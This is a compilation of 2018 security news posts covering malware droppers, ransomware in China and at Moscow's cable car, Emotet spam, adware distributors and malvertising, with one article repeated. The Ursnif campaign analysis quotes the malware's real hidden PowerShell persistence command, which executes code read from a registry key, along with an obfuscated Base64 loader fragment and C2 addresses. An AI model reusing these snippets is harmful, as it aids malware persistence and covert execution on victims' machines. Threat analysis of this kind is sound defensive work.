Trend Micro speculated that the malware operators’ current campaign may be a test run for a larger-scale botnet. Here, the ongoing impact is more worrisome: If whisper-quiet voice apps make their way onto user devices, compromise them without notice and leverage them for botnet-based attacks, the sheer numbers could be daunting at best and devastating at worst — especially if these applications make their way into popular download platforms.

Be Vigilant to Spot Fake Voice Apps

Google has taken steps to remove these applications from the Play Store. But with the specter of new versions on the way, users and organizations must take steps to protect mobile devices from these trash-talking apps.

From an end-user standpoint, IBM X-Force recommends regular software updates for both operating systems and antivirus solutions to help reduce the success rate of fake application infections. Meanwhile, IBM security experts advise enterprises to invest in unified endpoint management (UEM) tools that enable IT teams to view, manage and protect all corporate-connected devices before they become fake voice app victims.

Source: Trend Micro

The post Fake Voice Apps Emerge in Google Play Store appeared first on Security Intelligence.

Russian Hospital Targeted With Flash Zero-Day After Kerch Incident

Security updates released by Adobe on Wednesday for Flash Player patch two vulnerabilities, including a critical flaw exploited by a sophisticated threat actor in attacks aimed at a healthcare organization associated with the Russian presidential administration. The attack may be related to the recent Kerch Strait incident involving Russia and Ukraine.

read more

Fractured Block Campaign: CARROTBAT dropper dupports a dozen decoy document formats

Palo Alto Networks recently discovered a malware dropper, dubbed CARROTBAT, that supports a dozen decoy document file formats to drop many payloads.

Experts from Palo Alto Networks have recently discovered a malware dropper, dubbed CARROTBAT, that supports a dozen decoy document file formats to drop many payloads.

Security experts from Palo Alto Networks have discovered a malware dropper, dubbed CARROTBAT, that could support a dozen decoy document file formats to drop many payloads.

Even if CARROTBAT was first discovered in March 2018, in the past three months experts observed an intensification of the activity associated with the dropper.

CARROTBAT was spotted while threat actors were using it to drop payloads in South and North Korea region, attackers were using subjects such as crypto-currencies, crypto-currency exchanges, and political events for the decoy documents.

“Unit 42 has uncovered a campaign leveraging a previously unreported customized dropper that is being used to deliver lures primarily pertaining to the South Korea and North Korea region. These lures revolve around a series of subjects, including various cryptocurrencies, cryptocurrency exchanges, and political events.” reads the analysis published by Palo Alto Networks.

CARROTBAT was used in an attack against a British government agency in December, at the time threat actors used the decoy documents to drop the SYSCON backdoor.

Palo Alto Networks detected 29 unique CARROTBAT samples since its discovery, they contained a total of 12 unique decoy documents.

Palo Alto Networks tracked the CARROTBAT attacks as Fractured Block, the attackers used 11 decoy document file formats (.doc, .docx, .eml, .hwp, .jpg, .pdf, .png, .ppt, .pptx, .xls, and .xlsx.)

In March attackers were using the dropper to deliver different payloads, including old versions of the SYSCON RAT and new sample of the OceanSalt malware.

Experts pointed out that CARROTBAT is not sophisticated and implements a rudimentary command obfuscation.

Once the embedded decoy document is opened, an obfuscated command is executed on the system to download and execute a remote file via the Microsoft Windows built-in certutil utility.

The analysis of timestamps associated with CARROTBAT samples revealed they have been compiled between March 2018 and September 2018.

Experts observed between March and July attackers using the dropper to deliver multiple instances of SYSCON. Since June, OceanSalt attackers started using it too.

Experts discovered an infrastructure overlap between the CARROTBAT and KONNI malware families.

Cisco Talos team discovered the KONNI malware in May when it was used in targeted attacks aimed at organizations linked to North Korea.

The malware, dubbed by researchers “KONNI,” was undetected for more than 3 years and was used in highly targeted attacks. It was able to avoid detection due to a continuous evolution, the recent versions capable of executing arbitrary code on the target systems and stealing data.

On August, experts at Cylance noticed that the decoy document used in KONNI attacks is similar to the one used in recent campaigns of the DarkHotel APT.

“Finding CARROTBAT provided an important lynchpin in identifying Fractured Block Campaign activity. Using CARROTBAT, we were able to find related OceanSalt, SYSCON and KONNI activity.”  Palo Alto Networks concludes. 

“The various overlaps encountered are notable, and it is our suspicion that this threat activity may all belong to the same threat actor. However, we do not believe there to be enough evidence at this time to make this claim with complete certainty.”

Pierluigi Paganini

(Security Affairs – Sofacy, Brexit)

The post Fractured Block Campaign: CARROTBAT dropper dupports a dozen decoy document formats appeared first on Security Affairs.

New strain of Ransomware infected over 100,000 PCs in China

Security experts reported a new strain of malware spreading in China, the malicious code rapidly infected over 100,000 PCs in just four days.

Unfortunately, the number of infections is rapidly increasing because hackers compromised a supply chain.

It is interesting to note that this ransomware requests victims to pay 110 yuan (nearly Euro 14) in ransom through WeChat Pay.

“On December 1, the first ransomware that demanded the “WeChat payment” ransom broke out in the country. According to the monitoring and evaluation of the “Colvet Threat Intelligence System”, as of the evening of the 4th, the virus infected at least 100,000 computers, not only locked the computer.” reads the analysis published by anti-virus firm Velvet Security

“The document also steals information on tens of thousands of user passwords on platforms such as Taobao and Alipay.” 

Victims are prompted to pay the ransomware to attackers’ WeChat account within 3 days to receive the decryption key. If the victim doesn’t pay the ransomware within a specific time, the malicious code will delete the decryption key from the C&C server.

The malicious code also implements password stealing abilities, the ransomware is able to steal users’ credential for popular Chinese services, including Alipay, NetEase 163 email service, Baidu Cloud Disk, Jingdong (JD.com), Taobao, Tmall , AliWangWang, and QQ websites.

The ransomware also collects information on the infected system, including CPU model, screen resolution, network information and list of installed software.

According to experts from Velvet Security, hackers compromised the supply chain of the “EasyLanguage” programming software used by a large number of application developers.

The tainted software is used by hackers to inject the malicious code into every software compiled through the programming software.

To avoid detection, author of the threat signed the code with a trusted digital certificate issued form from Tencent Technologies and avoid encrypting data in some specific directories, like “Tencent Games, League of Legends, tmp, rtl, and program.

The good news for the victims is that researchers were able to crack the ransomware; the experts discovered that the malware uses XOR cipher, instead of DES, to encrypt the file, it also stores a copy of the decryption key locally on the victim’s system in the following path:

%user%\AppData\Roaming\unname_1989\dataFile\appCfg.cfg

Velvet experts released d a free ransomware decryption tool that could be used to decrypt documents encrypted by the malware.

Experts attributed the ransomware to a software programmer named “Luo,” they reported their discovery to the Chinese authorities.

ransomware author

Pierluigi Paganini

(Security Affairs – cybercrime, China)

The post New strain of Ransomware infected over 100,000 PCs in China appeared first on Security Affairs.

Windows 10 version 1809 is incompatible with Morphisec anti-malware

By Carolina

Another day, another reason for Windows 10 to make headlines for all the wrong reasons. It is a fact that Windows 10 is currently used by over 400 million users globally but lately, its updates have been causing users a great deal of trouble and especially with Microsoft’s October 2018 update for Windows 10 version […]

This is a post from HackRead.com Read the original post: Windows 10 version 1809 is incompatible with Morphisec anti-malware

New Ransomware Spreading Rapidly in China Infected Over 100,000 PCs

A new piece of ransomware is spreading rapidly across China that has already infected more than 100,000 computers in the last four days as a result of a supply-chain attack... and the number of infected users is continuously increasing every hour. What's Interesting? Unlike almost every ransomware malware, the new virus doesn't demand ransom payments in Bitcoin. Instead, the attacker is

Thanksgiving Spam Campaign Use Obfuscation to Deliver Emotet Banking Trojan

Researchers uncovered a Thanksgiving-themed spam campaign that uses obfuscation to deliver the Emotet banking Trojan.

Trustwave’s SpidersLab came across a campaign that attempted to trick recipients into opening a fake Thanksgiving-themed e-card. The card was actually a Microsoft Word document saved as XML. This format helped the attack email evade malware filters and scanners.

Upon opening the document, researchers observed a small TextFrame object sitting in the top-left corner. Expanding this object revealed an obfuscated Command Prompt (CMD) shell that included an obfuscated PowerShell command. Once executed, the command downloaded a binary from one of five URLs, saved it to the Windows temporary file and executed it.

All the binary files delivered by the campaign were Emotet, a banking Trojan known for its ability to steal information from emails and web browsers.

Scam Campaigns Abound Around the Holidays

Fraudsters don’t just limit their holiday-themed spam campaigns to fake Thanksgiving e-cards. According to FBI Jacksonville, bad actors commonly resort to at least four different types of ruses around the holidays, including online shopping scams advertising offers that are too good to be true and fake social media contests that use surveys to steal people’s personal information.

Even if they do take time off during the holidays, fraudsters don’t usually wait too long to get back to business-as-usual. Case in point: Malwarebytes observed a large spam campaign delivering Neutrino bot within the first two weeks of 2017.

How to Defend Against Holiday-Related Spam

The United States Computer Emergency Response Team (US-CERT) urges consumers to defend against holiday-related spam by avoiding suspicious links and email attachments. In the meantime, organizations should increase their network monitoring during the holiday season and use various types of threat intelligence to defend against and block new spam campaigns.

Sources: Trustwave’s SpidersLab, FBI Jacksonville, Malwarebytes, US-CERT

The post Thanksgiving Spam Campaign Use Obfuscation to Deliver Emotet Banking Trojan appeared first on Security Intelligence.

Dissecting the latest Ursnif DHL-Themed Campaign

Security experts at Yoroi – Cybaze Z-Lab discovered a new variant of the infamous Ursnif malware targeted Italian users through a malspam campaign.

Introduction

In the last weeks, a new variant of the infamous Ursnif malware was discovered hitting Italian users through a malspam campaign. In fact, Yoroi-Cybaze ZLAB isolated several malicious emails having the following content:

  • Subject: “VS Spedizione DHL AWB 94856978972 proveniente dalla GRAN BRETAGNA AVVISO DI GIACENZA”
  • Attachment: “GR930495-30495.zip”

The content of the attachment is a .js file and when it is launched, starts the infection by downloading other components from the Internet.

The Dropper

The initial dropper is an obfuscated javascript. Once run, it generates a lot of noisy internet traffic with the purpose to harden the detection of the real malicious infrastructures; as we can see from the following figures, the script contains a series of random-looking URLs it unsuccessfully tries to connect to, generating a huge volume of noise into the analysis environment.

dissecting-ursnif-dhl-campaign

Figure 1: Hard coded urls where the malware tries to connect to generate noise

dissecting-ursnif-dhl-campaign

Figure 2: Generated internet traffic noise

However, the real malicious action performed by the javascript is to create a batch file in the “%APPDATA%\Roaming\325623802.bat” path. The file is a simple script file containing the following code:

dissecting-ursnif-dhl-campaign

Figure 3: Extracted batch file

The script execution pops up to the screen a harmless “FedEx” brochure in pdf format used to decoy the victim, in the meanwhile it downloads and extract a PE32 executable file from a CAB archive hosted on a compromised Chinese website.

dissecting-ursnif-dhl-campaign

Figure 4: PDF downloaded to the internet and shown to the user

The second stage

The second stage of the infection chain is the “ppc.cab” file downloaded by the dropper to the “%APPDATA%\Roaming” location: it actually is a Microsoft Cabinet archive embedding an executable file named “puk.exe”.
The “puk.exe” file promptly spawns a new copy of its own process to make the debugging harder, then it starts several instances of the Internet Explorer process to hide its network activity inside legitimate processes.

Figure 5: spawned processes by the original “puk.exe”

The network traffic generated by the iexplore.exe processes points to the remote destination 149.129.129.1 (ALICLOUD-IN) and 47.74.131.146 (AL-3), part of the malicious infrastructure of the attacker.

dissecting-ursnif-dhl-campaign
Figure 6: C2 network traffic

The beaconing pattern recognized in the C2 communication is consistent with Gozi/Ursnif/IFSB/Dreambot malware variants. In addition, the particular “/wpapi/” base url adopted by the sample matches several malspam campaign tracked during the current year (rif EW. N070618N030618N010318).

dissecting-ursnif-dhl-campaign
Figure 7: Malware’s beaconing requests

Persistency

The third stage of the malware is designed to ensure its persistence into the infected system in the long run. It sets up a particular registry key containing chunks of binary data: “HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\6C174C70-DB2B-7E6F-C560-3F92C994E3E6”

dissecting-ursnif-dhl-campaign

Figure 9: Registry key written by the malware

Among the registry key shown above, there is an entry named “ddraxpps”: this particular name has been also used into the persistency mechanism of other Ursnif samples analyzed back in January.  Also, the malware configures a key named “comuroxy” containing a wmic “process call create” command designed to invoke powershell code from the “ddraxpps” entry: C:\Windows\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\6C174C70-DB2B-7E6F-C560-3F92C994E3E6').ddraxpps))".

The “ddraxpps” registry key stores a hex string could be decoded applying a simple hex-to-ascii conversion, its content actually is the following obfuscated powershell code:

Figure 10: body of “ddraxpps” key

The first line of code shows a set of commands allowing the execution of some kind of payload encoded in decimal format. The array of numbers in at line two represents the actual executable payload in decimal notation.

  1. $sagsfg=“qmd”;function ndltwntg{$sxpjuhsps=[System.Convert]::FromBase64String($args[0]);[System.Text.Encoding]::ASCII.GetString($sxpjuhsps);};

The third line, instead, contains a base64 encoded powershell snippet revealing the usage of a known payload injection technique: the “APC injection” or “AtomBombing”, used to infect the “iexplore.exe” process.

dissecting-ursnif-dhl-campaign

Figure 11: Commands of the third row of “ddraxpps” key

All the commands shown in Figure 11 are necessary to perform the operation of APC Injection: in the first variable “$jtwhasq” there is the import of the necessary library “kernel32.dll”, in particular the functions “GetCurrentProcess()” and “VirtualAllocEx()”. The second row provides the importing of of the functions “GetCurrentThreadId()”, “QueueUserAPC()”, “OpenThread()”. The third contains the real injection: while the first two lines contains the preparation of all imports, functions and relative parameters, the third one is the responsible of the execution of the actual APC Injection technique. The first step is to properly create a Virtual Section using the “VirtualAllocEx()” function of the current process, identified thanks to “GetCurrentProcess()”. The malware is then copied to the virtual section and, finally, this section is injected in a local thread within the “iexplore.exe” process thanks to the “QueueUserAPC()” function.

Conclusion

In the end, the whole infection chain could be summarized in four stages: the generation of network noise to hide the attacker’s infrastructure, the download of the executable payload, the achievement of persistence through the registry key installed and the checking and the download of the Ursnif modules.

dissecting-ursnif-dhl-campaign

Figure 12. Representation of the infection chain

Further details, including IoCs and Yara rules, are reported in the original blog post published by Yoroi.

Dissecting the latest Ursnif DHL-Themed Campaign

Pierluigi Paganini

(Security Affairs – Ursnif, malware)

The post Dissecting the latest Ursnif DHL-Themed Campaign appeared first on Security Affairs.

Hacked Without a Trace: The Threat of Fileless Malware

Malware. The word alone makes us all cringe as we instantly relate it to something malicious happening on our computers or devices. Gone are the days when we thought the

The post Hacked Without a Trace: The Threat of Fileless Malware appeared first on The Cyber Security Place.

Software Company WakeNet AB Discovered Spreading PUPs to Users

Pay-per-install, or PPI for short, is a type of software program that presents users with third-party offers while they are in the middle of another download. If a user clicks on the third-party advertisement, the software developer earns money from the download. One specific PPI program has caught the attention of our McAfee ATR team, as they recently investigated a company that has taken advantage of this software and is using deceptive techniques to spread malicious files. Meet WakeNet AB, a Swedish pay-per-install software developer that has generated a large amount of revenue – even more so than some of the most prevalent ransomware families – from spreading PUPs (potentially unwanted programs).

So, how does WakeNet AB infect users’ devices with PUPs? WakeNet sets up PPI sites to entice affiliate hackers to spread malicious files and adware. WakeNet’s most recent distribution vessel is the site FileCapital. FileCapital provides affiliate hackers with a variety of “marketing tools” such as embedded movies, landing pages, banners, and buttons. These deceptive tools are intended to coax victims into installing bundled applications that house different PUPs. Victims may install these applications because they are disguised as legitimate programs. For example, a user may think they are installing a helpful performance cleaner onto their computer. What they don’t know is that the “performance cleaner” is actually disguising other malicious files that could lead to irritating adverts and decreased computer performance.

As of now, it seems unlikely that PUP development will slow since it helps their distributors earn a considerable amount of money. With that said, it’s important now more than ever for users to be aware of the security risks involved with PUPs like the ones spread by WakeNet’s FileCapital. Check out the following tips to better protect yourself from this threat:

  • Click with caution. Be wary of pop-ups and websites asking you to click on items like movie playbacks and other software downloads. These items could infect your device with annoying adverts and malware.
  • Only download software from trusted sources. If you receive a pop-up asking you to update or install software, be vigilant. Adware and PUPs are often disguised as legitimate sites or software companies. Your best bet is to play it safe and go directly to the source when updating or installing new software.
  • Use a robust security software. Using a security solution like McAfee Total Protection could help protect your device from exposure to PUPs that have been spread by WakeNet’s FileCapital. McAfee Total Protection blocks auto-play videos on websites that decrease computer performance and warns you of risky websites and links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Software Company WakeNet AB Discovered Spreading PUPs to Users appeared first on McAfee Blogs.

Pay-Per-Install Company Deceptively Floods Market with Unwanted Programs

For the past 18 months, McAfee Labs has been investigating a pay-per-install developer, WakeNet AB, responsible for spreading prevalent adware such as Adware-Wajam and Linkury. This developer has been active for almost 20 years and recently has used increasingly deceptive techniques to convince users to execute its installers. Our report is now available online.

During a 10-month period from September 2017 to June 2018, we observed more than 1.9 million detections in the wild and the generation of thousands of unique websites and URLs. McAfee product protections prevented millions of pieces of adware from being installed on customers’ machines.

 

McAfee Adware-InstCap detections from September 2017 to June 2018.

Some of the deceptive tactics we observed included fake movie playbacks and fake torrent downloads targeting both Windows and Mac systems. These tactics aimed to trick users into installing bundled applications such as performance cleaners.

WakeNet AB’s FileCapital tools are responsible for installing some of the most prevalent potentially unwanted program (PUP) families, which plague infected clients with unwanted advertisements and seriously impact performance.

The revenue WakeNet AB generated in one year puts it above some of the most prevalent ransomware families, which explains why creating PUPs is so appealing. PUP developers generate revenue primarily by exploiting PC users.

PUPs

A PUP is software that might offer some useful functionality to a customer but also presents some risk. Users see some PUPs as benign, others as malicious. One of the latter is Adware-Elex (aka Fireball), which infected 250 million devices. McAfee strives to protect its customers against all kinds of threats, including PUPs.

The McAfee PUP Policy helps users understand what is being installed on their systems and notifies them when a technology poses a risk to their systems or privacy. PUP detection and removal provides notification to our customers when a software program or technology lacks sufficient notification or control over the software, or fails to adequately gain user consent to the risks posed by the technology. For more on how McAfee defines and protects against PUPs, read the McAfee® Potentially Unwanted Programs Policy.

For a full analysis of WakeNet AB’s products, download the full report.

The post Pay-Per-Install Company Deceptively Floods Market with Unwanted Programs appeared first on McAfee Blogs.

Malware since 2017: Auction giant Sotheby’s Home hit by Magecart attack

By Waqas

Sotheby’s, an American multinational corporation and Auction House has become another victim of Magecart attack after hackers gained access to Sotheby’s home website and inserted a card-skimming code aiming at customers’ credit card and banking data. Although Sotheby’s detected the intrusion on 10th October 2018 the malware was present on its website and stealing personal and financial data of […]

This is a post from HackRead.com Read the original post: Malware since 2017: Auction giant Sotheby’s Home hit by Magecart attack

‘Tis the Season for Spreading Ad Malware

Although Black Friday and Cyber Monday are behind us, consumer scams are likely to continue surging through the coming month. Malicious actors know that online retail spikes during the holiday season, so they increase their efforts to spread ad malware rather than good cheer.

Cautious consumers might be on the lookout for malicious apps and websites, but another tactic that cybercriminals will likely leverage extensively is malvertising — ads embedded with malware. Retailers also tend to prioritize customer experience over data security, so it’s important to understand how to avoid malvertising scams and prevent opportunistic threat actors from affecting your network during the holiday season.

Recognize the Risk

According to a Black Friday digital fraud report from RiskIQ, “Some fake apps contain adware and ad clicks or malware that can steal personal information or lock the device until the user pays a ransom. Others encourage users to log in using their Facebook or Gmail credentials, potentially exposing sensitive personal information.” In fact, the researchers from RiskIQ found that the brand names of the five leading retailers were frequently used in malicious and fraudulent mobile apps.

With virtually every retailer promoting online shopping deals, the internet is a hotbed of opportunity for scams. Jerome Dangu and Jack Cohen Martin, co-founder and chief technology officer (CTO), respectively, of antimalvertising firm Confiant, said they uncovered what appeared to be the initial attack in an ongoing malvertising campaign on Nov. 12. During the course of discovery, Confiant blocked over 5 million malvertising impressions on the Google Play store meant to impersonate legitimate app downloads.

Because the ads were served in a top-tier exchange, more than 300 million bad impressions were served to publishers in just over a 48-hour period, Dangu and Cohen Martin explained. By comparison, the Zirconium group, named by Confiant as 2017’s largest malvertising operation, created and operated 28 fake ad agencies to distribute malvertising campaigns and was responsible for 1 billion impressions over the course of a full year.

Malvertising can target specific companies, but this particular campaign went after iOS users and used two domains and two types of payloads.

“One family of landing pages was more focused on fake offers from Amazon gift cards and Walmart, in differing denominations and variations,” Dangu explained.

How to Spot an Ad Malware Scam

The scam is essentially a way for an attacker to retrieve user data and resell it. Users are often delivered to fraudulent landing pages where they are asked different types of marketing questions about things like their insurance or interest in electronics.

“The attacker is getting an affiliation share on these forms that get submitted, but you can never get out of this loop of forms,” Dangu explained. “Users could enter their data forever until they finally realize it’s a waste of time and they aren’t getting an iPhone for a dollar.”

Because malicious actors have become increasingly sophisticated, the fraudulent landing pages they use appear legitimate.

“They are exploiting the user’s trust by creating malicious landing pages that adopt the same color scheme as Facebook or Google, for example. It’s important for users to make sure they are where they think they are and check the full URL address,” Cohen Martin said.

All Eyes on Mobile

In monitoring malicious traffic over the last year, Confiant saw one major change from the previous years that saw surges in malware and malvertising campaigns on browsers.

“Mobile is used more and more,” Dangu said. “Attackers are targeting more mobile through scam approaches, which is disturbing for publishers.”

In one case, ads were redirecting users to get them to subscribe to adult dating sites, and the cybercriminals were getting a cut on those subscriptions. Mobile sites tend to have more ads, and because of that density, it is more difficult to identify a scam.

“Because of the nature of business, the ads are being digitally placed there, and it is hard to get 100 percent visibility into what is going on,” said Dangu. “Service providers and exchanges need to do their part to prevent these types of risks from being available.”

How to Avoid Malvertising Scams

Given the evolution of scammer’s methods, it’s important to remember that if a deal seems too good to be true, it probably is.

“Consumers should be wary of deals and go directly to sites they trust,” said Mike Bittner, digital security and operations manager of The Media Trust.

Bittner also emphasized the responsibility of brands to identify all the code executing on their websites and mobile apps.

“Chances are high that online companies only know a small fraction of the 50–95 percent of code in their digital assets provided by third parties,” he said.

Security leaders can help protect their employees by integrating a holiday retail scam identification practice into their regular security awareness training program. They can also defend networks by deploying artificial intelligence-enabled software to flag anomalous behaviors that could potentially represent a breach.

Consumers have a choice when visiting e-commerce sites. Although it’s advisable to rely on trusted, reputable brands with strong ratings, cybercriminals are eager to exploit that trust by visually replicating those very brands. Staying cautious and fully aware of your online navigations will help you to remain safe during the holiday season and all year long.

The post ‘Tis the Season for Spreading Ad Malware appeared first on Security Intelligence.

Fight Evolving Cybersecurity Threats With a One-Two-Three Punch

When I became vice president and general manager for IBM Security North America, the staff gave me an eye-opening look at the malicious hackers who are infiltrating everything from enterprises to government agencies to political parties. The number of new cybersecurity threats is distressing, doubling from four to eight new malware samples per second between the third and fourth quarters of 2017, according to McAfee Labs.

Yet that inside view only increased my desire to help security professionals fulfill their mission of securing organizations against cyberattacks through client and industry partnerships, advanced technologies such as artificial intelligence (AI), and incident response (IR) training on the cyber range.

Cybersecurity Is Shifting From Prevention to Remediation

Today, the volume of threats is so overwhelming that getting ahead is often unrealistic. It’s not a matter of if you’ll have a breach, it’s a matter of when — and how quickly you can detect and resolve it to minimize damage. With chief information security officers (CISOs) facing a shortage of individuals with the necessary skills to design environments and fend off threats, the focus has shifted from prevention to remediation.

To identify the areas of highest risk, just follow the money to financial institutions, retailers and government entities. Developed countries also face greater risks. The U.S. may have advanced cybersecurity technology, for example, but we also have assets that translate into greater payoffs for attackers.

Remediation comes down to visibility into your environment that allows you to notice not only external threats, but internal ones as well. In fact, internal threats create arguably the greatest vulnerabilities. Users on the inside know where the networks, databases and critical information are, and often have access to areas that are seldom monitored.

Bring the Power of Partnerships to Bear

Once you identify a breach, you’ll typically have minutes or even seconds to quarantine it and remediate the damage. You need to be able to leverage the data available and make immediate decisions. Yet frequently, the tools that security professionals use aren’t appropriately implemented, managed, monitored or tuned. In fact, 44 percent of organizations lack an overall information security strategy, according to PwC’s “The Global State of Information Security Survey 2018.”

Organizations are beginning to recognize that they cannot manage cybersecurity threats alone. You need a partner that can aggregate data from multiple clients and make that information accessible to everyone, from customers to competitors, to help prevent breaches. It’s like the railroad industry: Union Pacific, BNSF and CSX may battle for business, but they all have a vested interest in keeping the tracks safe, no matter who is using them.

Harden the Expanding Attack Surface

Along with trying to counteract increasingly sophisticated threats, enterprises must also learn how to manage the data coming from a burgeoning number of Internet of Things (IoT) devices. This data improves our lives, but the devices give attackers even more access points into the corporate environment. That’s where technology that manages a full spectrum of challenges comes into play. IBM provides an immune system for security from threat intelligence to endpoint management, with a host of solutions that harden your organization.

Even with advanced tools, analysts don’t always have enough hours in the day to keep the enterprise secure. One solution is incorporating automation and AI into the security operations center (SOC). We layer IBM Watson on top of our cybersecurity solutions to analyze data and make recommendations. And as beneficial as AI might be on day one, it delivers even more value as it learns from your data. With increasing threats and fewer resources, any automation you can implement in your cybersecurity environment helps get the work done faster and smarter.

Make Incident Response Like Muscle Memory

I mentioned malicious insider threats, but users who don’t know their behavior creates vulnerabilities are equally dangerous — even if they have no ill intent. At IBM, for example, we no longer allow the use of thumb drives since they’re an easy way to compromise an organization. We also train users from myriad organizations on how to react to threats, such as phishing scams or bogus links, so that their automatic reaction is the right reaction.

This is even more critical for incident response. We practice with clients just like you’d practice a golf swing. By developing that muscle memory, it becomes second nature to respond in the appropriate way. If you’ve had a breach in which the personally identifiable information (PII) of 100,000 customers is at risk — and the attackers are demanding payment — what do you say? What do you do? Just like fire drills, you must practice your IR plan.

Additionally, security teams need training to build discipline and processes, react appropriately and avoid making mistakes that could cost the organization millions of dollars. Response is not just a cybersecurity task, but a companywide communications effort. Everyone needs to train regularly to know how to respond.

Check out the IBM X-Force Command Cyber Tactical Operations Center (C-TOC)

Fighting Cybersecurity Threats Alongside You

IBM considers cybersecurity a strategic imperative and, as such, has invested extensive money and time in developing a best-of-breed security portfolio. I’m grateful for the opportunity to put it to work to make the cyber world a safer place. As the leader of the North American security unit, I’m committed to helping you secure your environments and achieve better business outcomes.

The post Fight Evolving Cybersecurity Threats With a One-Two-Three Punch appeared first on Security Intelligence.

Security Affairs: Moscow’s New Cable Car closed due to a ransomware infection

Two days after Moscow opened a new cable car system hackers infected its computer systems with ransomware.

The cable car system is long over 700 meters and spans across the Moscow river linking the Luzhniki Olympic Complex to the observation platform on Sparrow Hills.

Two days after Moscow cable car was opened, the servers of the Moscow Ropeway (MKD), the organization that operates the infrastructure was infected with the ransomware and attackers requested the payment in Bitcoin.

The infection occurred on Wednesday, November 28, at around 14:00, local time, according to local news outlets,

“One day after opening to the general public, Moscow’s highly touted first-ever cable car was forced to shut down after a reported cyberattack.” reported The Moscow Times.

“However, a cyberattack forced all passengers to disembark the cable car only two hours after it opened, its operator said on Wednesday.”

A video on the Rossiiskaya Gazeta government daily’s website showed a police officer explaining people waiting in line that the cable car would not reopen “for technical reasons.”

On November 29, experts at MDK removed the malware from its systems and on November 30 the Cable car was resumed.

“Since November 30, 2018, the Moscow Ropeway (MKD) has been operating normally.

On November 29, 2018, the MKD officers diagnosed all the systems that ensure the safe operation of the cableway as part of test activities for the launch of the road.” states the announcement on the MKD website.

Russian police have identified the hacker who carried out the ransomware attack, a criminal case was launched into the hacker attack on the Moscow cable car server.

“The Nikulinsky inter-district prosecutor’s office recognized as lawful and justified the initiation of criminal proceedings by the investigative bodies of the Moscow police under Part 1 of Article 273 of the Criminal Code of the Russian Federation (” Creation, use and distribution of malicious computer programs “) into the cyber attack on the Moscow cableway server,” said the metropolitan prosecutor’s office Lyudmila Nefedova.

In November 2016, another public transport system was infected with ransomware,

This is not the first time that public transportation has been affected by ransomware. In November 2016, hackers crashed the computer system of the San Francisco’s Municipal railway, took offline the ticket kiosks offline and gave riders a free ride for an entire day.

Pierluigi Paganini

(Security Affairs – ransomware, Moscow cable car)

The post Moscow’s New Cable Car closed due to a ransomware infection appeared first on Security Affairs.



Security Affairs

Moscow’s New Cable Car closed due to a ransomware infection

Two days after Moscow opened a new cable car system hackers infected its computer systems with ransomware.

The cable car system is long over 700 meters and spans across the Moscow river linking the Luzhniki Olympic Complex to the observation platform on Sparrow Hills.

Two days after Moscow cable car was opened, the servers of the Moscow Ropeway (MKD), the organization that operates the infrastructure was infected with the ransomware and attackers requested the payment in Bitcoin.

The infection occurred on Wednesday, November 28, at around 14:00, local time, according to local news outlets,

“One day after opening to the general public, Moscow’s highly touted first-ever cable car was forced to shut down after a reported cyberattack.” reported The Moscow Times.

“However, a cyberattack forced all passengers to disembark the cable car only two hours after it opened, its operator said on Wednesday.”

A video on the Rossiiskaya Gazeta government daily’s website showed a police officer explaining people waiting in line that the cable car would not reopen “for technical reasons.”

On November 29, experts at MDK removed the malware from its systems and on November 30 the Cable car was resumed.

“Since November 30, 2018, the Moscow Ropeway (MKD) has been operating normally.

On November 29, 2018, the MKD officers diagnosed all the systems that ensure the safe operation of the cableway as part of test activities for the launch of the road.” states the announcement on the MKD website.

Russian police have identified the hacker who carried out the ransomware attack, a criminal case was launched into the hacker attack on the Moscow cable car server.

“The Nikulinsky inter-district prosecutor’s office recognized as lawful and justified the initiation of criminal proceedings by the investigative bodies of the Moscow police under Part 1 of Article 273 of the Criminal Code of the Russian Federation (” Creation, use and distribution of malicious computer programs “) into the cyber attack on the Moscow cableway server,” said the metropolitan prosecutor’s office Lyudmila Nefedova.

In November 2016, another public transport system was infected with ransomware,

This is not the first time that public transportation has been affected by ransomware. In November 2016, hackers crashed the computer system of the San Francisco’s Municipal railway, took offline the ticket kiosks offline and gave riders a free ride for an entire day.

Pierluigi Paganini

(Security Affairs – ransomware, Moscow cable car)

The post Moscow’s New Cable Car closed due to a ransomware infection appeared first on Security Affairs.

Moscow’s cable car service shuts down in 2 days after ransomware attack

By Waqas

The first cable-car service was launched in Moscow this Tuesday, and free rides to and from Luzhniki Stadium were promised to the visitors throughout the first month. Naturally, people were eager to ride the cable-car and thronged the location. However, much to their dismay, only after a few days the service got attacked with ransomware. […]

This is a post from HackRead.com Read the original post: Moscow’s cable car service shuts down in 2 days after ransomware attack

New PowerShell-based Backdoor points to MuddyWater

Security researchers at Trend Micro recently discovered PowerShell-based backdoor that resembles a malware used by MuddyWater threat actor.

Malware researchers at Trend Micro have discovered a Powershell-based backdoor that is very similar to a malware used by MuddyWater APT group.

The first MuddyWater campaign was observed in late 2017, then researchers from Palo Alto Networks were investigating a mysterious wave of attacks in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing these attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

Threat actors used PowerShell-based first stage backdoor named POWERSTATS, across the time the hackers changed tools and techniques.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by TEMP.Zagros group (another name used by the experts to track the MuddyWater), targeting Asia and Middle East regions from January 2018 to March 2018.

In the latest attacks detected by Trend Micro, threat actors used TTPs compatible with MuddyWater, the malicious code was uploaded to Virus Total from Turkey. The attackers used decoy documents that would drop a new PowerShell backdoor that is similar to MuddyWater’s POWERSTATS malware.

“These documents are named Raport.doc or Gizli Raport.doc (titles mean “Report” or “Secret Report” in Turkish) and maliyeraporti (Gizli Bilgisi).doc (“finance (Confidential Information)” in Turkish) — all of which were uploaded to Virus Total from Turkey.states Trend Micro.

“Our analysis revealed that they drop a new backdoor, which is written in PowerShell as MuddyWater’s known POWERSTATS backdoor. But, unlike previous incidents using POWERSTATS, the command and control (C&C) communication and data exfiltration in this case is done by using the API of a cloud file hosting provider.”

The new backdoor uses the API of a cloud file hosting provider to implement command and control (C&C) communication and data exfiltration.

The weaponized documents contain images showing blurry logos belonging to some Turkish government organizations, they trick victims into enabling macros to display the document properly.

MuddyWater

